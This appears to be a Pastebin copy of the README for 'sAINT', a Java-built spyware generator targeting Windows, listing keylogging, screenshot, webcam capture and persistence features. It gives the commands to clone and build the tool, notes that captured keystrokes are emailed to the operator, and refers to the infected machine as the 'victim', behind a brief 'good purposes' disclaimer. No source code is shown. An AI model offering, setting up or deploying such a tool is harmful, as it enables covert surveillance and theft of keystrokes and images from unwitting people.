Advertisement
TVT618

sAINT - A Spyware Generator for Windows written in Java

Jul 25th, 2018
241
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.48 KB | None | 0 0
  1. Disclaimer
  2. This project was created only for good purposes and personal use.
  3.  
  4. THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
  5.  
  6. Features:
  7. * Keylogger
  8. * Take Screenshot
  9. * Webcam Capture
  10. * Persistence
  11.  
  12. Tested by GitHackTools on:
  13. * Kali Linux 2018.1
  14. * Parrot Security OS 4.1
  15.  
  16. Install and Run:
  17. sudo apt update
  18. sudo apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y
  19. sudo apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses6 -y
  20. git clone https://github.com/tiagorlampert/sAINT
  21. cd sAINT
  22. bash configure.sh
  23. sudo java -jar sAINT.jar
  24.  
  25. Note:
  26. * On Windows, install the latest Java JRE 8 from Oracle.
  27. * Email will be sent when it reaches the specified number of characters.
  28. * Optionally you can enable Screenshot, Webcam Capture and Persistence.
  29.  
  30. FAQ:
  31. Why does the .EXE need java on target machine to run?
  32. The JRE is required and the executable will not work without it. Because the Windows need JRE for translating the program from java byte code to machine language.
  33.  
  34. Screenshots:
  35.  
  36. How to uninstall on victim: To uninstall run file UNINSTALL.bat with administrative permissions.
  37.  
  38. Contact: tiagorlampert@gmail.com
  39.  
  40. License: BSD 3-Clause License
  41.  
  42. Download sAINT: https://github.com/tiagorlampert/sAINT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement